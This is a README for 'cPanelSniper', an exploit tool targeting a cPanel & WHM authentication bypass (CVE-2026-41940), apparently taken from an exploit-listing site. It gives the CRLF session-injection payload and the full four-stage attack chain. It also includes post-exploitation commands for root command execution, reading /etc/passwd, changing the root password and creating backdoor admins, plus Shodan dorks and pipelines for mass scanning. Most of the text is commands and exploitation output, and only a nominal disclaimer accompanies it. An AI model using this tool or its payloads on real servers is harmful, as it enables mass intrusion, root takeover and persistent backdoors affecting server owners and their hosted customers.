Share
## https://sploitus.com/exploit?id=8BE7143A-66B7-5C64-8527-24F5A571CCDE
# cPanelSniper


  



  
  
  
  
  
  



  CVE-2026-41940 β€” cPanel & WHM Authentication Bypass via Session-File CRLF Injection
  4-stage exploit chain Β· Interactive WHM Shell Β· Bulk scanner Β· Pipeline ready Β· stdlib only


---

## Overview

**cPanelSniper** is a focused exploitation framework for **CVE-2026-41940**, a critical authentication bypass vulnerability affecting cPanel & WHM. The vulnerability allows unauthenticated remote attackers to gain root-level WHM access by injecting CRLF sequences into the session file via the `Authorization` HTTP header β€” without any valid credentials.

- **CVSS Score:** 10.0 (Critical)
- **In-the-wild exploitation:** Confirmed (April 2026)
- **Affected installs:** ~70 million domains running cPanel & WHM
- **No dependencies:** Pure Python stdlib β€” no pip, no requests, no external packages

> **For authorized penetration testing and bug bounty programs only.**

---

## How It Works

The root cause lives in `Session.pm`: the `saveSession()` function calls `filter_sessiondata()` **after** writing the session file to disk. This means CRLF characters embedded in the `Authorization: Basic` header value are written verbatim into the session file, injecting attacker-controlled fields before sanitization occurs.

```
Normal flow:
  POST /login/ β†’ filter_sessiondata() β†’ write session β†’ auth check

Vulnerable flow:
  POST /login/ β†’ write session (CRLF payload injected) β†’ filter_sessiondata() β†’ auth check reads poisoned file
```

### The CRLF Payload

The `Authorization: Basic` value decodes to:

```
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1
```

These fields are written directly into the session file on disk. When read back, cPanel treats the session as a fully authenticated root session.

### 4-Stage Exploit Chain

```
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  Stage 0 β€” Canonical Hostname Discovery                     β”‚
β”‚  GET /openid_connect/cpanelid β†’ 307 β†’ real hostname         β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  Stage 1 β€” Mint Preauth Session                             β”‚
β”‚  POST /login/?login_only=1  (wrong creds)                   β”‚
β”‚  ← 401 + whostmgrsession cookie                             β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  Stage 2 β€” CRLF Injection                                   β”‚
β”‚  GET / + Cookie: session + Authorization: Basic    β”‚
β”‚  cpsrvd writes CRLF fields into session file                β”‚
β”‚  ← 307 Location: /cpsessXXXXXXXXXX/...                     β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  Stage 3 β€” Propagate (do_token_denied gadget)               β”‚
β”‚  GET /scripts2/listaccts                                    β”‚
│  Triggers raw→cache flush — injected fields become active   │
β”‚  ← 401 Token denied (expected)                              β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚  Stage 4 β€” Verify WHM Root Access                           β”‚
β”‚  GET /cpsessXXXXXXXXXX/json-api/version                     β”‚
β”‚  ← 200 {"version":"11.x.x.x","result":1}  = PWNED          β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
```

---

## Affected Versions

| Branch | Vulnerable | Patched |
|--------|-----------|---------|
| 110.x | ≀ 11.110.0.96 | **11.110.0.97** |
| 118.x | ≀ 11.118.0.62 | **11.118.0.63** |
| 126.x | ≀ 11.126.0.53 | **11.126.0.54** |
| 132.x | ≀ 11.132.0.28 | **11.132.0.29** |
| 134.x | ≀ 11.134.0.19 | **11.134.0.20** |
| 136.x | ≀ 11.136.0.4  | **11.136.0.5**  |

---

## Installation

```bash
git clone https://github.com/ynsmroztas/cPanelSniper
cd cPanelSniper
python3 cPanelSniper.py --help
```

No pip install required. Pure Python 3.8+ stdlib only.

---

## Usage

### Basic Scan

```bash
# Single target β€” scan only
python3 cPanelSniper.py -u https://target.com:2087

# Single target β€” interactive shell after bypass
python3 cPanelSniper.py -u https://target.com:2087 --action shell

# Bulk scan from file
python3 cPanelSniper.py -l targets.txt -t 20 -o results.json

# Force scan (skip cPanel detection)
python3 cPanelSniper.py -u https://target.com:2087 --force
```

### Post-Exploit Actions

```bash
# List all cPanel accounts on the server
python3 cPanelSniper.py -u https://target.com:2087 --action list

# Execute OS command
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "ls /home"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "cat /etc/passwd"

# Get server info (hostname, load, disk, MySQL host)
python3 cPanelSniper.py -u https://target.com:2087 --action info

# Get cPanel version
python3 cPanelSniper.py -u https://target.com:2087 --action version

# Change root password
python3 cPanelSniper.py -u https://target.com:2087 --action passwd --passwd 'NewPass@2026!'

# Interactive WHM shell
python3 cPanelSniper.py -u https://target.com:2087 --action shell
```

### Pipelines

```bash
# subfinder β†’ httpx β†’ cPanelSniper
subfinder -d target.com -silent | \
  httpx -silent -ports 2087,2086 -threads 50 | \
  python3 cPanelSniper.py -t 30 -o results.json

# From scope list
cat scope.txt | \
  httpx -silent -ports 2087,2086 -threads 100 | \
  python3 cPanelSniper.py -t 30 -o results.json

# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python3 cPanelSniper.py -t 30 -o shodan_results.json

# stdin pipe
echo "https://target.com:2087" | python3 cPanelSniper.py

# Multiple sources combined
{ subfinder -d target.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python3 cPanelSniper.py -t 20 --action list
```

---

## Interactive WHM Shell

After a successful bypass, the `--action shell` flag drops into an interactive prompt:

```
════════════════════════════════════════════════════════════
  WHM Shell β€” target.com
  Version: CVE-2026-41940 | Auth: CRLF bypass
  Type 'help' for commands, 'exit' to quit
════════════════════════════════════════════════════════════

mitsec@target.com β–Ά id
  uid=0(root) gid=0(root) groups=0(root)

mitsec@target.com β–Ά accounts
  [cPanel Accounts]  target.com:2087 (47 users)
    user01               domain: example.com    email: admin@example.com
    user02               domain: shop.com       email: info@shop.com
    ...

mitsec@target.com β–Ά cat /etc/passwd
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  ...

mitsec@target.com β–Ά info
  [Server Info]  https://target.com:2087
  hostname: srv01.target.com
  load: 0.72 / 0.66 / 0.69
  version: 11.130.0.6

mitsec@target.com β–Ά addadmin mitsec P@ss2026!
  [BACKDOOR ADMIN CREATED]
  Target   : https://target.com:2087
  Username : mitsec
  Password : P@ss2026!
  Profile  : super_admin

mitsec@target.com β–Ά exit
```

### Shell Commands

| Command | Description |
|---------|-------------|
| `id` / `whoami` | Show UID and hostname |
| `hostname` | Get server hostname |
| `version` | cPanel version info |
| `info` | Load, disk, MySQL host, version |
| `accounts` | List all cPanel user accounts |
| `cat ` | Read file content |
| `ls [path]` | List directory |
| `exec ` | Execute OS command |
| `addadmin  ` | Create backdoor WHM admin |
| `passwd ` | Change root password |
| `api  [k=v ...]` | Raw WHM JSON API call |
| `help` | Show all commands |
| `exit` | Exit shell |

---

## CLI Reference

```
usage: cPanelSniper.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] [--no-color]

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors
```

---

## Shodan Dorks

```
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
http.title:"cPanel" port:2083
ssl.cert.subject.cn:"cPanel" port:2087
```

---

## Output Example

```
   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—
  β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘
  ...

  CVE-2026-41940 β€” cPanel & WHM Auth Bypass via CRLF Injection
  4-stage: preauth β†’ CRLF inject β†’ propagate β†’ verify β†’ post-exploit
  In-The-Wild | CVSS 10.0 | By Mitsec (@ynsmroztas)

  Configuration:
   Targets  : 1
   Threads  : 10
   Timeout  : 15s
   Action   : list

14:46:22 [SCAN] Starting 4-stage exploit chain... https://target.com:2087
14:46:23 [INFO] Canonical hostname discovered: srv01.target.com
14:46:23 [STEP] Stage 1/4 β€” Minting preauth session...
14:46:23 [  OK] Stage1: preauth session = :QFB4o8XENBqlr6U1...
14:46:23 [STEP] Stage 2/4 β€” CRLF injection via Authorization header...
14:46:24 [  OK] Stage2: HTTP 307 β†’ token=/cpsess8493537756
14:46:24 [STEP] Stage 3/4 — Firing do_token_denied gadget (raw→cache)...
14:46:25 [  OK] Stage3: HTTP 401 β€” do_token_denied gadget fired
14:46:25 [STEP] Stage 4/4 β€” Verifying WHM root access...
14:46:26 [PWND] CVE-2026-41940 CONFIRMED β€” WHM root access!
14:46:26 [PWND]   Token    : /cpsess8493537756
14:46:26 [PWND]   Version  : 11.130.0.6
14:46:26 [PWND]   API URL  : https://target.com:2087/cpsess8493537756/json-api/version
14:46:26 [ API] Running post-exploit action: list
14:46:27 [ API] listaccts β†’ HTTP 200

  [cPanel Accounts]  target.com:2087 (47 accounts)
    client01    domain: client01.com    email: admin@client01.com
    client02    domain: client02.net    email: info@client02.net
    ...

══════════════════════════════════════════════════════════════════════
  cPanelSniper β€” Scan Complete
  Time: 5.8s  Β·  Targets: 1

  ⚑ 1 VULNERABLE TARGET(S)

  Target   : https://target.com:2087
  Version  : 11.130.0.6
  Token    : /cpsess8493537756
  API URL  : https://target.com:2087/cpsess8493537756/json-api/version
══════════════════════════════════════════════════════════════════════
```

---

## Technical Details

### Session File Injection

The injected `Authorization: Basic` value (base64-decoded) contains CRLF sequences that become newlines in the cPanel session file:

```
root:x\r\n
successful_internal_auth_with_timestamp=9999999999\r\n
user=root\r\n
tfa_verified=1\r\n
hasroot=1
```

cPanel's session reader parses these as legitimate session fields, granting full root WHM access.

### Stage 3 β€” The do_token_denied Gadget

The critical and often-overlooked step: after the CRLF injection (Stage 2), the poisoned session data exists only in the **raw session file**. A request to `/scripts2/listaccts` triggers the internal `do_token_denied` handler, which flushes the raw session data into the session **cache**. Without this flush, Stage 4 would return a 403.

### Session Token Extraction

```
Set-Cookie: whostmgrsession=%3aSESSION_NAME%2cOB_HEX; ...
                              ^              ^
                              |              +-- ob hash (stripped)
                              +-- session name (used for injection)
```

The session name (before `%2C`) is extracted and used as the cookie value for subsequent requests.

---

## References

- [watchTowr Labs β€” CVE-2026-41940 Technical Analysis](https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/)
- [cPanel Security Advisory](https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026)
- [NVD β€” CVE-2026-41940](https://nvd.nist.gov/vuln/detail/CVE-2026-41940)
- [Hadrian Blog β€” CVE-2026-41940 Analysis](https://hadrian.io/blog/cve-2026-41940-a-critical-authentication-bypass-in-cpanel)
- [Nuclei Template β€” CVE-2026-41940](https://cloud.projectdiscovery.io/library/CVE-2026-41940)

---

## Disclaimer

> This tool is intended for **authorized security testing** and **bug bounty programs only**. Unauthorized access to computer systems is illegal. The author assumes no liability and is not responsible for any misuse or damage caused by this tool. Always obtain proper written authorization before testing.

---

## Author

**Mitsec** β€” [@ynsmroztas](https://twitter.com/ynsmroztas)

- πŸ† Top Hacker β€” Intigriti
- πŸ› 2,430+ vulnerabilities disclosed
- πŸ’€ 1,100+ P1 Critical findings
- πŸ… 100+ Hall of Fame recognitions

---


  Made with ❀️ by @ynsmroztas